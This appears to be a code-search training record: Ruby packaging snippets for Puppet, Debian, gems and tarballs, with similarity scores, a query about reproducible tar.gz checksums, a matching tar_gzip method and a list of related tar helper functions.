"def package_tarballs( mods_dirs )\n pwd = Dir.pwd\n mods_dirs.each do |module_dir|\n next unless File.directory? module_dir\n FileUtils.chdir module_dir, :verbose => (verbose?)\n\n cmd = \"puppet module build --render-as=json\"\n puts cmd if verbose?\n tgz = `#{cmd}`.split(\"\\n\").last.gsub('\"','')\n puts \"--[tgz] built module archive: #{tgz}\" if verbose?\n FileUtils.cp tgz, @tars_dir, :verbose => verbose?\n end\n FileUtils.chdir pwd, :verbose => verbose?\n end",
"def path_for(package)\n \"#{package.path}.metadata.json\"\n end",
"def dmg_package_source\n if %i(direct repo).include?(new_resource.source)\n return package_metadata[:url]\n end\n path = new_resource.source.to_s\n (path.start_with?('/') ? 'file://' : '') + path\n end",
"def bundle_directory\n @yaml[\"paths\"][\"bundle_directory\"]\n end",
"def package_download_url\n package_filename_url_safe = Info.release_version.gsub(\"+\", \"%2B\")\n \"https://#{Info.release_bucket}.#{Info.release_bucket_s3_endpoint}/ubuntu-focal/#{Info.package}_#{package_filename_url_safe}_amd64.deb\"\n end",
"def install_dir # :nodoc:\n File.join Gem.dir, 'bundler', 'gems', \"#{@name}-#{dir_shortref}\"\n end",
"def installer_filename\n if PRE_RELEASE\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar\"\n else\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar.gz\"\n end\nend",
"def build_dist_path(item)\n sub_build_dir = File.join(@config.build_dir, item.name)\n return Dir[File.join(sub_build_dir, \"#{item.name}-[0-9.]*.tar.gz\")][0]\n end",
"def write_pkg_metadata\n render_template(resource_path(\"gen.manifestfile.erb\"),\n destination: pkg_metadata_file,\n variables: {\n name: safe_base_package_name,\n fmri_package_name: fmri_package_name,\n description: project.description,\n summary: project.friendly_name,\n arch: safe_architecture,\n })\n\n # Append the contents of symlinks_file if it exists\n if symlinks_file\n File.open(pkg_metadata_file, \"a\") do |symlink|\n symlink.write(render_symlinks)\n end\n end\n\n # Print the full contents of the rendered template file to generate package contents\n log.debug(log_key) { \"Rendered Template:\\n\" + File.read(pkg_metadata_file) }\n end",
"def do_dmg_package_resource!\n dmg_package 'Chef Development Kit' do\n app dmg_package_app\n volumes_dir 'Chef Development Kit'\n source dmg_package_source\n type 'pkg'\n package_id 'com.getchef.pkg.chefdk'\n checksum dmg_package_checksum\n end\n end",
"def config_schema_generation_directory\n FilePath.new(@build_dir, \"generated\", \"config-schema\")\n end",
"def package(pkg, options = Hash.new)\n\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :existing_source_dir => nil,\n :patch_dir => nil\n\n if options[:force_update]\n dirname = File.join(OBS_BUILD_DIR, debian_name(pkg))\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n prepare_source_dir(pkg, options)\n\n if pkg.kind_of?(Autobuild::CMake) || pkg.kind_of?(Autobuild::Autotools)\n package_deb(pkg, options)\n elsif pkg.kind_of?(Autoproj::RubyPackage)\n package_ruby(pkg, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkg.class} for #{pkg.name}\"\n end\n end",
"def default_install_dir\n @install_dir ||= CernerSplunk::PathHelpers.default_install_dirs[package][node['os'].to_sym]\n raise \"Unsupported Combination: #{package} + #{node['os']}\" unless @install_dir\n @install_dir\n end",
"def create_package(type, data)\n begin\n dirpackage = FPM::Package::Dir.new\n dirpackage.attributes[:chdir] = @tmpdir\n dirpackage.input @libdir\n ospackage = dirpackage.convert(FPM::Package.const_get(@package_type))\n params(ospackage, type, data)\n filename = \"mcollective-#{package.metadata[:name].downcase}-#{type}-#{package.metadata[:version]}-#{package.iteration}#{@arch}.#{@package_type.downcase}\"\n\n do_quietly? do\n ospackage.output(filename)\n end\n\n puts \"Successfully built #{@package_type} '#{filename}'\"\n rescue Exception => e\n puts \"Failed to build package mcollective-#{package.metadata[:name].downcase}-#{type}. - #{e}\"\n ensure\n ospackage.cleanup if ospackage\n dirpackage.cleanup if dirpackage\n end\n end",
"def dir\n Rails.root.join(ROOT, type, name).to_s\n end",
"def backupDir\n\t\tdataDir = self.dataDir\n\t\tif (dataDir.nil? || dataDir.empty? || dataDir[\"/var/pgsql\"])\n\t\t\treturn BACKUP_DIR\n\t\tend\n\t\treturn dataDir.sub(/Data\\z/, \"Backup\")\n\tend",
"def build_archive_dir\n out = config_source['build-archive-dir']\n out = nil if (out != nil && out.downcase == 'none')\n out = FilePath.new(out) unless out.nil?\n out\n end",
"def gen_dir(gendir = nil)\n @gen_dir = \"#{gendir}#{gendir.empty? ? '.' : ''}\" if gendir\n @gen_dir\n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def pkg_export\n return if @export.count == 0\n\n sysprint \"#{@name} export\"\n\n @export.each_pair do |src, dst|\n dst = File::join($project_rootdir, dst)\n if File::directory? src\n FileUtils::mkdir_p dst\n continue\n end\n\n # Create directory if it doesn't exists\n FileUtils::mkdir_p dst[0..-(File::basename(dst).length + 1)]\n\n if File::executable? src\n FileUtils::install(src, dst, :mode => 0755)\n else\n FileUtils::install(src, dst, :mode => 0644)\n end\n end\n end",
"def base_export_dir\n \"#{@directory.slug}_files\"\n end",
"def golang_project_dirname\n DeliveryGolang::Helpers.golang_project_dirname(node)\n end",
"def convert_package(pkginfo, packaging_dir,\n gem_name: nil,\n patch_dir: nil\n )\n Packager.info \"Package Ruby: '#{pkginfo.name}' with gem_name: '#{gem_name}'\"\n\n # update dependencies in any case, i.e. independent if package exists or not\n deps = pkginfo.dependencies\n Dir.chdir(pkginfo.srcdir) do\n begin\n logname = \"package-ruby-#{pkginfo.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n logfile = File.join(log_dir, logname)\n\n gem = FileList[\"pkg/*.gem\"].first\n if not gem\n Packager.info \"#{self.class}: preparing gem generation in #{Dir.pwd}\"\n\n # Rake targets that should be tried for cleaning\n gem_clean_success = false\n Gem.clean_alternatives.each do |target|\n msg, status = Open3.capture2e(pkginfo.env, \"bundle exec rake #{target}\")\n if !status.success?\n Packager.info \"#{self.class}: failed to clean package '#{pkginfo.name}' using target '#{target}' #{msg} (see #{logfile})\"\n File.open(logfile,\"a+\") {|f| f.puts msg }\n else\n Packager.info \"#{self.class}: succeeded to clean package '#{pkginfo.name}' using target '#{target}'\"\n gem_clean_success = true\n break\n end\n end\n if not gem_clean_success\n Packager.warn \"#{self.class}: failed to cleanup ruby package '#{pkginfo.name}' -- continuing without cleanup\"\n end\n\n Packager.info \"#{self.class}: ruby package Manifest.txt is being autogenerated\"\n Package2Gem.generate_manifest_txt\n Package2Gem.cleanup_multiple_gemspec(gem_name)\n\n Packager.info \"#{self.class}: creating gem from package #{pkginfo.name} [#{File.join(log_dir, logname)}]\"\n\n if patch_pkg_dir(pkginfo.name, patch_dir, whitelist: [\"*.gemspec\", \"Rakefile\", \"metadata.yml\"])\n Packager.info \"#{self.class}: patched build files for ruby package before gem building: #{pkginfo.name}\"\n end\n\n # Allowed gem creation alternatives\n gem_creation_success = false\n\n # Gemspec often use the 'git ls -z' listings, which\n # might break if hidden files will be removed\n # without commiting -- so temporarily add and revert\n # again, to maintain the original commit id\n # TBD: or leave the commit and list the last N commits in the changelog\n Packager.info \"#{self.class}: temporarily commit changes in #{Dir.pwd}\"\n _,_,git_add_status = Open3.capture3(\"git add -A\")\n msg,git_commit_status = Open3.capture2(\"git commit -m 'Apaka: gem creation' --author 'Apaka Packager, <apaka@autocommit>'\")\n if !git_commit_status.success?\n Packager.info \"#{self.class}: commit failed: #{msg}\"\n end\n Gem.creation_alternatives.each do |target|\n msg, status = Open3.capture2e(pkginfo.env, \"bundle exec rake #{target}\")\n if !status.success?\n Packager.info \"#{self.class}: failed to create gem using target '#{target}' (see #{logfile})\"\n File.open(logfile,\"a+\") do |f|\n f.puts msg\n f.puts pkginfo.env\n end\n else\n Packager.info \"#{self.class}: succeeded to create gem using target '#{target}'\"\n gem_creation_success = true\n break\n end\n end\n if git_commit_status.success?\n Packager.info \"#{self.class}: git package status\"\n msg, git_revert = Open3.capture2(\"git reset --soft HEAD~1\")\n Packager.info \"#{self.class}: reversion of temporary commit failed\"\n end\n if not gem_creation_success\n raise RuntimeError, \"Debian: failed to create gem from RubyPackage #{pkginfo.name}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # other packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n if gem_name\n gem_name = gem.sub(Packaging.basename(pkginfo.name), gem_name)\n if gem != gem_name\n Packager.info \"#{self.class}: renaming #{gem} to #{gem_name}\"\n end\n else\n gem_name = gem\n end\n Packager.info \"#{self.class}: '#{pkginfo.name}' -- basename: #{Packaging.basename(pkginfo.name)} will be packaged as: #{gem_name}\"\n\n gem_final_path = File.join(packaging_dir, File.basename(gem_name))\n Packager.info \"#{self.class}: copy #{File.join(Dir.pwd, gem)} to #{gem_final_path}\"\n FileUtils.cp gem, gem_final_path\n return gem_final_path\n\n rescue Exception => e\n raise RuntimeError, \"#{self.class}: failed to create gem from RubyPackage #{pkginfo.name} -- #{e.message}\\n#{e.backtrace.drop(1).map{|s| \"\\t#{s}\"}}\"\n end\n end\n end",
"def maintainer\n \"#{@package.maintainer} <#{@package.email}>\"\n end",
"def package_artifact\n # keep track of current working dir\n current_dir = Dir.pwd\n Dir.chdir @configuration.package_destination_path\n\n # zip final package\n cmd = []\n cmd << \"zip\"\n cmd << \"-r\"\n cmd << \"\\\"#{@configuration.zipped_package_name}\\\"\"\n cmd << \"\\\"#{@configuration.dsym_name}\\\"\" unless @configuration.skip_dsym\n cmd << \"\\\"#{@configuration.ipa_name}\\\"\" unless !@configuration.sdk.eql? \"iphoneos\"\n cmd << \"\\\"#{@configuration.app_name}.#{@configuration.app_extension}\\\"\" unless !@configuration.sdk.eql? \"macosx\"\n cmd << \"2>&1 %s ../build.output\" % (@configuration.verbose ? '| tee' : '>')\n\n system cmd.join \" \"\n\n # delete all the artifacts but the .app. which will be needed by the automation builds\n FileUtils.rm_rf @configuration.dsym_name unless !File.exists? @configuration.dsym_name\n FileUtils.rm_rf @configuration.ipa_name unless !File.exists? @configuration.ipa_name\n\n # back to working directory\n Dir.chdir current_dir\n\n puts \"Done\"\n puts \"ZIP package: #{@configuration.zipped_package_name}\"\n end",
"def path_for(package)\n \"#{package.path}.metadata.json\"\n end",
"def distutils\n site_packages(libexec).parent/\"distutils\"\n end",
"def get_setuptools\n\t\tpackage_name = \"python-setuptools\"\n\t\tcase node.platform\n\t\twhen /fedora|redhat|centos|ubuntu/\n\t\t package_name = \"python-setuptools\"\n\t\tend\n\t\tpackage_name\n\tend",
"def context_dir\n File.join(DOTDIR, package)\n end",
"def directory\n File.join(Cfg.rootdir, @category, @suitename, @component, \"binary-#{name}\")\n end",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def installer_path\n %x[which apt-get].chomp\n end",
"def module_root\n metadata_path = find_upwards('metadata.json')\n if metadata_path\n File.dirname(metadata_path)\n else\n nil\n end\n end",
"def os_install_dir\n @os_install_dir\n end",
"def get_dir_name\n return @builder['dir_label'].text\n end",
"def initialize_reprepro_conf_dir(release_prefix)\n if !@reprepro_lock.owned?\n raise ThreadError.new\n end\n \n conf_dir = File.join(deb_repository, release_prefix, \"conf\")\n if File.exist? conf_dir\n Packager.info \"Reprepo repository exists: #{conf_dir}\"\n else\n Packager.info \"Initializing reprepo repository in #{conf_dir}\"\n system(\"sudo\", \"mkdir\", \"-p\", conf_dir, :close_others => true)\n\n user = Etc.getpwuid(Process.uid).name\n Packager.info \"Set owner #{user} for #{deb_repository}\"\n system(\"sudo\", \"chown\", \"-R\", user, deb_repository, :close_others => true)\n system(\"sudo\", \"chown\", \"-R\", user, deb_repository + \"/\", :close_others => true)\n system(\"sudo\", \"chmod\", \"-R\", \"755\", conf_dir, :close_others => true)\n end\n\n distributions_file = File.join(conf_dir, \"distributions\")\n if !File.exist?(distributions_file)\n File.open(distributions_file,\"w\") do |f|\n Config.linux_distribution_releases.each do |release_name, release|\n f.write(\"Codename: #{release_name}\\n\")\n f.write(\"Architectures: #{Config.architectures.keys.join(\" \")} source\\n\")\n f.write(\"Components: main\\n\")\n f.write(\"UDebComponents: main\\n\")\n f.write(\"Tracking: minimal\\n\")\n f.write(\"Contents:\\n\\n\")\n end\n end\n end\n end"
] | [
"0.7038908",
"0.6894775",
"0.6833736",
"0.681512",
"0.6646762",
"0.6568039",
"0.6338617",
"0.63289803",
"0.62737525",
"0.62679255",
"0.6170336",
"0.61601603",
"0.6086764",
"0.5999166",
"0.59521484",
"0.5935174",
"0.5926287",
"0.5916547",
"0.589468",
"0.5887863",
"0.58775705",
"0.58314574",
"0.57975197",
"0.5770237",
"0.57582",
"0.5750014",
"0.57229996",
"0.5694661",
"0.5664136",
"0.56610465",
"0.5647779",
"0.56295735",
"0.56295735",
"0.56033665",
"0.56028044",
"0.55962867",
"0.55579656",
"0.55505985",
"0.55299336",
"0.5511317",
"0.5492833",
"0.5487359",
"0.5479451",
"0.5453905",
"0.5444602",
"0.54424745",
"0.54332757",
"0.5427621",
"0.54265594",
"0.5423723",
"0.5419855",
"0.5417579",
"0.5400831",
"0.53780264",
"0.5377322",
"0.5374782",
"0.536958",
"0.5349062",
"0.5349062",
"0.5338558",
"0.5338155",
"0.53341097",
"0.5323618",
"0.53227645",
"0.53175026",
"0.53087866",
"0.5299336",
"0.5297111",
"0.5292696",
"0.52835226",
"0.52808905",
"0.5280131",
"0.5279975",
"0.5278416",
"0.5266952",
"0.5265795",
"0.52636665",
"0.524771",
"0.52428216",
"0.5241887",
"0.522514",
"0.5215445",
"0.52117306",
"0.5210753",
"0.5209061",
"0.5208421",
"0.52045494",
"0.5204123",
"0.5203926",
"0.519559",
"0.5191847",
"0.5186471",
"0.51678807",
"0.51506686",
"0.5150048",
"0.51236063",
"0.51224077",
"0.51208866",
"0.51186687",
"0.5118599"
] | 0.7265215 | 0 |
A tar gzip version that reproduces same checksums on the same day when file content does not change Required to package orig.tar.gz | def tar_gzip(archive, tarfile, pkg_time, distribution = nil,
logfile: nil)
# Make sure no distribution information leaks into the package
if distribution and archive =~ /~#{distribution}/
archive_plain_name = archive.gsub(/~#{distribution}/,"")
FileUtils.cp_r archive, archive_plain_name
else
archive_plain_name = archive
end
Packager.info "Tar archive: #{archive_plain_name} into #{tarfile}"
# Make sure that the tar files checksum remains the same by
# overriding the modification timestamps in the tarball with
# some external source timestamp and using gzip --no-name
#
# exclude hidden files an directories
mtime = pkg_time.iso8601()
# Exclude hidden files and directories at top level
cmd_tar = "tar --mtime='#{mtime}' --format=gnu -c --exclude '.+' --exclude-backups --exclude-vcs --exclude #{archive_plain_name}/debian --exclude build #{archive_plain_name} | gzip --no-name > #{tarfile}"
if system(cmd_tar, [:out,:err] => redirection(logfile, "a"))
Packager.info "Package: successfully created archive using command '#{cmd_tar}' -- pwd #{Dir.pwd} -- #{Dir.glob("**")}"
checksum = `sha256sum #{tarfile}`
Packager.info "Package: sha256sum: #{checksum}"
return true
else
Packager.info "Package: failed to create archive using command '#{cmd_tar}' -- pwd #{Dir.pwd}"
return false
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def tar_gz_file\n \"#{package_name}.tar.gz\"\n end",
"def get_gzipped_backup\n tar_file = get_tempfile\n safe_run \"tar -czf #{tar_file} #{tar_dir}\"\n tar_file\n end",
"def compress_source_tgz(path)\n tarfile = Tempfile.create([\"vagrant\", \".tar\"])\n tarfile.close\n tarfile = File.open(tarfile.path, \"wb+\")\n tgzfile = Tempfile.create([\"vagrant\", \".tgz\"])\n tgzfile.close\n tgzfile = File.open(tgzfile.path, \"wb\")\n tar = Gem::Package::TarWriter.new(tarfile)\n tgz = Zlib::GzipWriter.new(tgzfile)\n if File.file?(path)\n tar.add_file(File.basename(path), File.stat(path).mode) do |io|\n File.open(path, \"rb\") do |file|\n while bytes = file.read(4096)\n io.write(bytes)\n end\n end\n end\n else\n Dir.glob(File.join(path, \"**/**/*\")).each do |item|\n rel_path = item.sub(path, \"\")\n item_mode = File.stat(item).mode\n\n if File.directory?(item)\n tar.mkdir(rel_path, item_mode)\n else\n tar.add_file(rel_path, item_mode) do |io|\n File.open(item, \"rb\") do |file|\n while bytes = file.read(4096)\n io.write(bytes)\n end\n end\n end\n end\n end\n end\n tar.close\n tarfile.rewind\n while bytes = tarfile.read(4096)\n tgz.write bytes\n end\n tgz.close\n tgzfile.close\n tarfile.close\n File.delete(tarfile.path)\n tgzfile.path\n end",
"def tar_xz_file\n \"#{package_name}.tar.xz\"\n end",
"def prep_command #:nodoc:\n \"tar cvf #{full_tarfile} #{remote_directory}; gzip -f #{full_tarfile}\"\n end",
"def extract_tar_gz\n Gem::Package::TarReader.new(Zlib::GzipReader.open(base.package)) do |tar|\n\n # Progressbar\n progressbar = ProgressBar.create(format: PROGRESSBAR_FORMAT, total: tar.count)\n\n # tar.count move position pointer to end\n tar.rewind\n\n dest_file = nil\n tar.each do |entry|\n if entry.full_name == TAR_LONGLINK\n dest_file = File.join(@tmpdir, entry.read.strip)\n next\n end\n dest_file ||= File.join(@tmpdir, entry.full_name)\n if entry.directory?\n FileUtils.rm_rf(dest_file) unless File.directory?(dest_file)\n FileUtils.mkdir_p(dest_file, mode: entry.header.mode, verbose: false)\n elsif entry.file?\n FileUtils.rm_rf(dest_file) unless File.file?(dest_file)\n File.open(dest_file, 'wb') do |f|\n f.write(entry.read)\n end\n FileUtils.chmod(entry.header.mode, dest_file, verbose: false)\n elsif entry.header.typeflag == '2' # symlink\n File.symlink(entry.header.linkname, dest_file)\n end\n\n dest_file = nil\n progressbar.increment\n end\n end\n end",
"def compress\n @env[:ui].info I18n.t(\"vagrant.actions.general.package.compressing\", :tar_path => tar_path)\n File.open(tar_path, Platform.tar_file_options) do |tar|\n Archive::Tar::Minitar::Output.open(tar) do |output|\n begin\n current_dir = FileUtils.pwd\n\n copy_include_files\n\n FileUtils.cd(@env[\"package.directory\"])\n Dir.glob(File.join(\".\", \"**\", \"*\")).each do |entry|\n Archive::Tar::Minitar.pack_file(entry, output)\n end\n ensure\n FileUtils.cd(current_dir)\n end\n end\n end\n end",
"def tar_compression_flag(path)\n case path\n when /\\.tar\\.bz2$/\n return \"-j\"\n when /\\.tar\\.gz$|\\.tgz$/\n return \"-z\"\n when /\\.tar\\.xz$/\n return \"-J\"\n else\n return nil\n end\n end",
"def tar_bz2_file\n \"#{package_name}.tar.bz2\"\n end",
"def tgz_file\n \"#{package_name}.tgz\"\n end",
"def tar_compression_flag\n case compression\n when :bzip2, \"bzip2\", nil\n \"j\"\n when :gzip, \"gzip\"\n \"z\"\n when :none, \"none\"\n \"\"\n end\n end",
"def tarball\n Dir[\"#{dest}/#{SCOPE}-#{gemspec.name}-#{gemspec.version}.tgz\"].first\n end",
"def untgzp(file, location)\n if file[-7..-1] != \".tar.gz\"\n print \"ERROR: expected a tar.gz file: #{file}\\n\"\n exit\n end\n if os_short() == 'sunos'\n tar = \"gtar\"\n else\n tar = \"#{bin('tar')}\"\n end\n sh \"#{tar} --directory #{location} -xf #{file}\"\nend",
"def add_gem_contents\n @tar_writer.add_file \"data.tar.gz\", 0644 do |inner|\n sio = @signer ? StringIO.new : nil\n Zlib::GzipWriter.wrap(sio || inner) do |os|\n\n Gem::Package::TarWriter.new os do |data_tar_writer|\n def data_tar_writer.metadata() @metadata end\n def data_tar_writer.metadata=(metadata) @metadata = metadata end\n\n yield data_tar_writer\n\n @metadata = data_tar_writer.metadata\n end\n end\n\n # if we have a signing key, then sign the data\n # digest and return the signature\n if @signer then\n digest = Gem::Security::OPT[:dgst_algo].digest sio.string\n @data_signature = @signer.sign digest\n inner.write sio.string\n end\n end\n\n self\n end",
"def valid_gzip? archive\n return unless archive\n return unless File.exist? archive\n `tar tf #{archive} >/dev/null`\n $?.exitstatus == 0\nend",
"def tar(path)\n tar_filename = Pathname.new(path).realpath.to_path + '.tar'\n File.open(tar_filename, 'wb') do |tarfile|\n get_files_to_pack(path).each do |file|\n if File.file?(file)\n File.open(file, 'rb') do |f|\n while buffer = f.read(BLOCKSIZE_TO_READ)\n tarfile.write buffer\n end\n end\n else\n tarfile.write file.gsub(path, '')\n end\n end\n end\n\n tar_filename\n\n end",
"def full_tarfile #:nodoc:\n [tar_directory, tarfile].join(\"/\")\n end",
"def untar_file(f, to)\n line(\"tar\", \"-xf {file} -C {path}\").pass(file: f, path: to)\n end",
"def tar(file)\n TarTask.define_task(file)\nend",
"def tar0(otarfile, *src)\n raise \"no file or directory to tar\" if !src || src.length == 0\n Gem::Package::TarWriter.new otarfile do |tar|\n Find.find *src do |f|\n mode = File.stat(f).mode\n if File.directory? f\n tar.mkdir f, mode\n else\n tar.add_file f, mode do |tio|\n File.open f, 'r' do |io|\n tio.write io.read\n end\n end\n end\n end\n end\n end",
"def kubernetes_compressed_file\n \"#{file_cache_path}/kubernetes-#{version}.tar.gz\"\n end",
"def tar_data(verbose)\n shell = SwrShell.new\n @fileutils.su_mkdir_p @config[\"tar_data\"], verbose\n @fileutils.su_du_sh \"#{@datadir}\", verbose\n cmd = \"tar -C #{@datadir} -c . | snzip > #{File.join(@config[\"tar_data\"],\"data.tar.snz\")}\"\n shell.su_execute(cmd,verbose)\n if @datadir == @logdir\n #log and data dirs are the same so creating empty log.tar.gz\n @fileutils.su_mkdir_p \"empty\", verbose\n @fileutils.su_tar \" -C empty \",\" -cf #{File.join(@config[\"tar_data\"],\"log.tar\")}\",\".\", verbose\n @fileutils.su_rm_rf \"empty\", verbose\n elsif @logdir != ''\n cmd = \"tar -C #{@logdir} -c . | snzip > #{File.join(@config[\"tar_data\"],\"log.tar.snz\")}\"\n shell.su_execute(cmd,verbose)\n end\n cmd = \"cd #{@config[\"tar_data\"]}; du -h; sudo touch md5sums.txt; sudo chmod a+rw md5sums.txt; sudo md5sum data.tar* >> md5sums.txt; sudo md5sum log.tar* >> md5sums.txt;\"\n shell.execute(cmd,verbose,true)\n @fileutils.sync verbose\n end",
"def should_unpack_tgz? dir, clobber=nil\n return !directory_has_children?(dir) || clobber == :clobber\n\n end",
"def tar\n Omnibus.which(\"gtar\") ? \"gtar\" : \"tar\"\n end",
"def test_tar\n\tx = \"test_tar\"\n\t@output = @s.archive({ 'files'=> [@test_directory_1_Path], 'format'=>'tar' , 'recurse'=>false } )\n\t#puts @output['archiveFile']\n\t\n\t@testid= 1\n\tTar.open(@output['archiveFile'], File::RDONLY, 0644, Tar::GNU | Tar::VERBOSE) do |tar|\n while tar.read # or 'tar.each do ...'\n #puts tar.pathname\n\t\t\n\t\t\n # tar.print_long_ls\n\n if tar.reg? && tar.pathname!=\"test_directory_1/.DS_Store\" # regular file\n tar.extract_file('test')\n\t\t want = File.read(File.join(@testdir, tar.pathname))\n\t\t puts tar.pathname\n\t\t #asserting bar1,2,3 from tar file is same as original bar1,2,3\n\t\t assert_log( want, File.read('test'), $log, x, @testid)\n end\n end\n\n ##if extract all files\n #tar.extract_all\n end\n\n\n ##for gzip archive\n #Tar.gzopen('foo.tar.gz', ...\n\n ##for bzip2 archive\n #Tar.bzopen('foo.tar.bz2', ...\n \n \n \n end",
"def tar_dist(val)\n Utilities.tar_dist(val)\n end",
"def tar\n @tarreader\n end",
"def cdtargz(cdpath, targzfile, *src)\n raise \"tar.gz file #{targzfile} shouldn't be a directory\" if File.directory? targzfile\n Zlib::GzipWriter.open targzfile do |otarfile|\n cdtar0 cdpath, otarfile, *src\n end\n end",
"def tgz___( directory, filename )\r\n raise StandardError, \"Under investigation\" \r\n got = @ndev.rpc.file_archive( :destination => filename, :source => directory, :compress => true )\r\n end",
"def tarball\n tarfile = StringIO.new(\"\")\n Gem::Package::TarWriter.new(tarfile) do |tar|\n path = \"#{staging_dir}/#{packager.package_name}\"\n name = packager.package_name\n mode = File.stat(path).mode\n\n tar.add_file(name, mode) do |tf|\n File.open(path, \"rb\") do |file|\n tf.write(file.read)\n end\n end\n end\n\n tarfile.rewind\n tarfile\n end",
"def assemble_tgz\n banner \"Assembling #{TAR}...\"\n rm_and_mkdir(DIR)\n \n # gem\n run(\"cp\", [\"-r\", \"#{File.dirname(__FILE__)}/../../lib\", GEM])\n # data\n mkdir(DATA)\n copy = []\n copy << \"Telfile\"\n copy += Dir[\"files*\"]\n copy.sort.each { |i| run(\"cp\", [\"-r\", i, DATA]) }\n # config.sh\n File.open(\"#{DIR}/config\", \"w\") do |f|\n f.puts(\"CONFIG_HOST='#{@options[:host]}'\") \n f.puts(\"CONFIG_RUBY='#{@config.ruby}'\")\n f.puts(\"CONFIG_RUBYGEMS='#{RUBYGEMS}'\") \n end\n # keys\n ssh_key = \"#{ENV[\"HOME\"]}/.ssh/#{PUBKEY}\"\n if File.exists?(ssh_key)\n run(\"cp\", [ssh_key, DIR])\n end\n \n Dir.chdir(File.dirname(DIR)) do\n run(\"tar\", [\"cfpz\", TAR, File.basename(DIR)])\n end\n end",
"def test_verify_package_checksum\n assert_nothing_raised('verify good checksum') { Tpkg::verify_package_checksum(@pkgfile) }\n\n # Add a few characters to the inner checksummed tarball and test that\n # it now fails the checksum verification\n tar = Tpkg::find_tar\n Dir.mktmpdir('workdir') do |workdir|\n system(\"#{tar} -C #{workdir} -xf #{@pkgfile}\") || abort\n File.open(File.join(workdir, 'testpkg-1.0-1', 'tpkg.tar'), 'a') do |file|\n file.write('xxxxxx')\n end\n badpkg = Tempfile.new('tpkgtest')\n system(\"#{tar} -C #{workdir} -cf #{badpkg.path} testpkg-1.0-1\") || abort\n assert_raise(RuntimeError, 'verify bad checksum') { Tpkg::verify_package_checksum(badpkg.path) }\n end\n\n # Confirm that checksum verification also fails on something that isn't a valid package\n puts '#'\n puts '# Errors expected here'\n puts '#'\n boguspkg = Tempfile.new('tpkgtest')\n boguspkg.puts('xxxxxx')\n boguspkg.close\n assert_raise(RuntimeError, NoMethodError, 'verify bogus non-tarball') { Tpkg::verify_package_checksum(boguspkg.path) }\n # And for completeness how about something that is a tarball but not a valid package\n boguspkg2 = Tempfile.new('tpkgtest')\n system(\"#{tar} -cf #{boguspkg2.path} #{boguspkg.path}\")\n assert_raise(RuntimeError, NoMethodError, 'verify bogus tarball') { Tpkg::verify_package_checksum(boguspkg2.path) }\n end",
"def tar_compression_extension\n case compression\n when :bzip2, \"bzip2\", nil\n \".bz2\"\n when :gzip, \"gzip\"\n \".gz\"\n when :none, \"none\"\n \"\"\n end\n end",
"def generate_tar_file(path_to_file)\n tar_path = temp_path(path_to_file)\n command = \"tar --create --format=gnu --preserve-permissions --absolute-names --file=#{tar_path} #{path_to_file}\"\n bash_out(command)\n return tar_path\n end",
"def extract_pack\n io = Zlib::GzipReader.new(DataDragon.data_pack_path.open)\n\n Gem::Package::TarReader.new(io) do |tar|\n tar.each do |tarfile|\n destination_file = (DataDragon.data_unpacked_path + tarfile.full_name)\n\n if tarfile.directory?\n destination_file.mkpath\n else\n destination_directory = destination_file.dirname\n destination_directory.mkpath unless destination_directory.directory?\n destination_file.write(tarfile.read)\n end\n end\n end\n end",
"def add_metadata\n return if @metadata.nil?\n\n @tar_writer.add_file \"metadata.gz\", 0644 do |io|\n begin\n sio = @signer ? StringIO.new : nil\n gzos = Zlib::GzipWriter.new(sio || io)\n gzos.write @metadata\n ensure\n gzos.flush\n gzos.finish\n\n # if we have a signing key, then sign the metadata digest and return\n # the signature\n if @signer then\n digest = Gem::Security::OPT[:dgst_algo].digest sio.string\n @meta_signature = @signer.sign digest\n io.write sio.string\n end\n end\n end\n end",
"def tar_gz(filename, basename)\n # TODO: detect if there's an appropriately-named subdirectory within. If not, then make/cd into it.\n exec_and_return_output_array(\"tar -xvvzf #{filename}\")\n puts basename\n # puts 'filename - without extension'\nend",
"def tar_content_filenames\n `tar tzf #{filename}`.split(\"\\n\")\n end",
